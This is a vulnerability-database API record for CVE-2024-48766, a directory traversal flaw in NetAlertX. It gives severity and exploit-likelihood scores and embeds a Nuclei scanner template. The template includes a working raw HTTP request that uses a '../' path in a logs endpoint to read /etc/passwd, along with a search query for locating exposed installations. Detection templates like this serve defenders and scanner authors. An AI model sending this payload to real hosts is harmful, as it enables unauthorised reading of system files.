{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-48766/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-48766/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-48766/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-48766/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-48766/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-48766"},"sightings":{"href":"/api/v1/sightings/cve-2024-48766"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.69697,"kev":false,"percentile":0.99347},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-48766.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2024-48766\n\ninfo:\n  name: NetAlert X - Arbitary File Read\n  author: s4e-io\n  severity: critical\n  description: |\n    A directory traversal vulnerability has been identified in NetAlertX versions v24.7.18 - v24.9.12.\n  impact: |\n    This vulnerability allows remote attackers to list directories on the affected system. Successful exploitation could enable unauthorized users to explore the system’s internal structure.\n  remediation: |\n    Fixed in v24.10.12\n  reference:\n    - https://advisories.checkpoint.com/defense/advisories/public/2025/cpai-2024-1358.html\n    - https://github.com/rapid7/metasploit-framework/pull/19881\n    - https://github.com/jokob-sk/NetAlertX\n  classification:\n    cve-id: CVE-2024-48766\n    cwe-id: CWE-22\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n    cvss-score: 8.6\n    epss-score: 0.69697\n    epss-percentile: 0.99347\n    cpe: cpe:2.3:a:netalertx:netalertx:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: jokob-sk\n    product: netalertx\n    fofa-query: \"NetAlert X\"\n  tags: cve,cve2024,netalertx,lfi,vkev,vuln\n\nvariables:\n  filename: \"{{rand_base(6)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /php/components/logs.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        items=[{\"buttons\":[{\"labelStringCode\":\"Maint_PurgeLog\",\"event\":\"logManage(app.log, cleanLog)\"},{\"labelStringCode\":\"Maint_RestartServer\",\"event\":\"askRestartBackend()\"}],\"fileName\":\"{{filename}}\",\"filePath\":\"../../../../..//etc/passwd\",\"textAreaCssClass\":\"logs\"}]\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"regex('root:.*:0:0:', body)\"\n          - 'contains(body, \"Purge log\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a004730450220059a89d084b2af39f2dbeefcb9f320f9ff2374a1047d5a6a72afc2a819ad66a4022100f616645d425f0de6d196f4d410c67468d0346d247c24b24ce0377176d0417286:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2024-48766"}